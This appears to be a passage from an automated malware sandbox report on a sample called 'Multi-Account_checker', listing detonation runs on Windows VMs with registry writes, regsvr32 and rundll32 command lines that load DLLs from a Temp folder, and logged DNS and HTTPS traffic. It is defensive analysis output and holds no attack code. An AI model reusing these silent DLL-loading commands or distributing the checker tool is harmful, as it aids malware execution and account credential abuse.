Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\MapiProxy_InUse.dll" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\InProcServer32\ThreadingModel = "Both" C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\ = "PSFactoryBuffer" C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7} C:\Windows\system32\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods C:\Windows\system32\regsvr32.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Interface\{6EDCD38E-8861-11D5-A3DD-00B0D0F3BAA7}\NumMethods\ = "16" C:\Windows\system32\regsvr32.exe N/A

Processes

C:\Windows\system32\regsvr32.exe

regsvr32 /s C:\Users\Admin\AppData\Local\Temp\MapiProxy_InUse.dll

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240611-en

Max time kernel

149s

Max time network

282s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libGLESv2.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240226-en

Max time kernel

287s

Max time network

311s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1344 --field-trial-handle=2236,i,5367110156796017614,12594004256180761011,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 20.231.121.79:80 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 216.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 13.107.246.64:443 tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 227.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 8.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.200.42:443 chromewebstore.googleapis.com tcp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240611-en

Max time kernel

118s

Max time network

127s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe

"C:\Users\Admin\AppData\Local\Temp\Multi-Checker.exe"

Network

N/A

Files


Analysis: behavioral18

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win10v2004-20240226-en

Max time kernel

229s

Max time network

312s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

Signatures

N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\libssp-0.dll,#1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=2232 --field-trial-handle=2284,i,15722001240173834669,15048020084704567542,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 196.131.50.23.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 142.250.187.202:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 pki.goog udp
US 8.8.8.8:53 pki.goog udp
US 216.239.32.29:80 pki.goog tcp
US 8.8.8.8:53 202.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 29.32.239.216.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 35.15.31.184.in-addr.arpa udp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 227.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 186.77.117.104.in-addr.arpa udp
US 8.8.8.8:53 10.179.89.13.in-addr.arpa udp

Files

memory/1196-0-0x0000000068AC0000-0x0000000068AE6000-memory.dmp

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-20 19:27

Reported

2024-06-20 19:33

Platform

win7-20240220-en

Max time kernel

118s

Max time network

121s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

Signatures

N/A

Processes

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Multi-Account_checker.zip

Network

N/A

Files

N/A